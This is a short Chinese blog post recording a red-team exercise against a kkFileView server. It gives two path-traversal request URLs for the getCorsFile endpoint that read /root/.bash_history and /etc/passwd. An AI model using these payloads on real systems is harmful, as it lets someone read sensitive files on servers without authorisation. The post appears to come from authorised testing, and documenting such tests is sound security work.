攻防演练参加的越多,越发感觉打点越来越难。。。之前shiro反序列化之类可以无脑getshell的漏洞还挺多的,今年已经鲜有遇到了。这是上次遇到某目标的打点过程,记录一下。
过程记录
其他不多说了,直接复述一下对目标ip的测试过程。
简单扫了一眼,资产挺多,但是没啥能利用的(技术不到位)。挨页点着翻,看到了kkfileview,这个之前也遇到过,但是也没多想过。这次搜了下它的漏洞,结果发现还挺多的,顿时有一种错过好几个shell的感觉。。。。。
任意文件读取漏洞测试
看到存在任意文件读取,就想通过这个漏洞看能不能利用下。用户历史命令记录文件
http://ip/getCorsFile?urlPath=file:///../../root/.bash_history
账户信息
http://ip/getCorsFile?urlPath=file:///../..//etc/passwd